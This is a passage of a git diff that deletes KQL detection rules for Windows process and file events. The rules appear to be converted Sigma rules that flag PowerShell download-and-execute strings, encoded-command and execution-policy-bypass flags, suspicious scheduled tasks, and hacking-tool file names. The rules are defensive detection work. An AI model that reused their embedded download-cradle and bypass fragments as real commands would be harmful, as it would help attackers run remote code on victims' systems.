-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"
\ No newline at end of file
diff --git a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 504899dd..00000000
--- a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql b/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql
deleted file mode 100644
index 047e80a5..00000000
--- a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/28
-// Level: high
-// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile("
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql b/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql
deleted file mode 100644
index 787c878f..00000000
--- a/Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/05/24
-// Level: high
-// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql b/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql
deleted file mode 100644
index 54d656c3..00000000
--- a/Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/24
-// Level: high
-// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Parameter_Substring.kql b/Execution/Suspicious_PowerShell_Parameter_Substring.kql
deleted file mode 100644
index 9a895de4..00000000
--- a/Execution/Suspicious_PowerShell_Parameter_Substring.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects suspicious PowerShell invocation with a parameter substring
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Parent_Process.kql b/Execution/Suspicious_PowerShell_Parent_Process.kql
deleted file mode 100644
index 04761c14..00000000
--- a/Execution/Suspicious_PowerShell_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Harish Segar
-// Date: 2020/03/20
-// Level: high
-// Description: Detects a suspicious or uncommon parent processes of PowerShell
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql b/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index c2d28b62..00000000
--- a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ")
\ No newline at end of file
diff --git a/Execution/Suspicious_Program_Names.kql b/Execution/Suspicious_Program_Names.kql
deleted file mode 100644
index 793a6794..00000000
--- a/Execution/Suspicious_Program_Names.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/11
-// Level: high
-// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter"))
\ No newline at end of file
diff --git a/Execution/Suspicious_RASdial_Activity.kql b/Execution/Suspicious_RASdial_Activity.kql
deleted file mode 100644
index 4e30f528..00000000
--- a/Execution/Suspicious_RASdial_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious process related to rasdial.exe
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where FolderPath endswith "rasdial.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 62278102..00000000
--- a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql b/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql
deleted file mode 100644
index 38edae09..00000000
--- a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018/12/27
-// Level: high
-// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
-// Tags: attack.execution, attack.t1059, attack.t1202
-DeviceProcessEvents
-| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Runscripthelper.exe.kql b/Execution/Suspicious_Runscripthelper.exe.kql
deleted file mode 100644
index 568eff5f..00000000
--- a/Execution/Suspicious_Runscripthelper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of powershell scripts via Runscripthelper.exe
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Scan_Loop_Network.kql b/Execution/Suspicious_Scan_Loop_Network.kql
deleted file mode 100644
index 19d4fbec..00000000
--- a/Execution/Suspicious_Scan_Loop_Network.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/12
-// Level: medium
-// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
-// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
deleted file mode 100644
index 00359f36..00000000
--- a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/11
-// Level: high
-// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql b/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql
deleted file mode 100644
index 6bdb9b98..00000000
--- a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/31
-// Level: medium
-// Description: Detects creation of a scheduled task with a GUID like name
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {")
\ No newline at end of file
diff --git a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
deleted file mode 100644
index 6ba5044f..00000000
--- a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/16
-// Level: high
-// Description: Detects the creation of tasks from processes executed from suspicious locations
-// Tags: attack.persistence, attack.execution, attack.t1053
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks"
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql
deleted file mode 100644
index fe01afd0..00000000
--- a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/03/15
-// Level: high
-// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql b/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql
deleted file mode 100644
index cd2233e3..00000000
--- a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/21
-// Level: medium
-// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml \"C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\.CR." and ProcessCommandLine contains "Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\AppData\\Local\\Temp\\is-" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or ((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR") or InitiatingProcessCommandLine contains "unattended.ini"))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql b/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql
deleted file mode 100644
index 5bf43f5b..00000000
--- a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/31
-// Level: medium
-// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")
\ No newline at end of file
diff --git a/Execution/Suspicious_Schtasks_Schedule_Types.kql b/Execution/Suspicious_Schtasks_Schedule_Types.kql
deleted file mode 100644
index 93316841..00000000
--- a/Execution/Suspicious_Schtasks_Schedule_Types.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects scheduled task creations or modification on a suspicious schedule type
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql b/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql
deleted file mode 100644
index 3b3ce9ee..00000000
--- a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
-// Date: 2021/07/14
-// Level: high
-// Description: Detects a suspicious script executions from temporary folder
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Spool_Service_Child_Process.kql b/Execution/Suspicious_Spool_Service_Child_Process.kql
deleted file mode 100644
index 9e6385cb..00000000
--- a/Execution/Suspicious_Spool_Service_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
-// Date: 2021/07/11
-// Level: high
-// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
-// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068
-DeviceProcessEvents
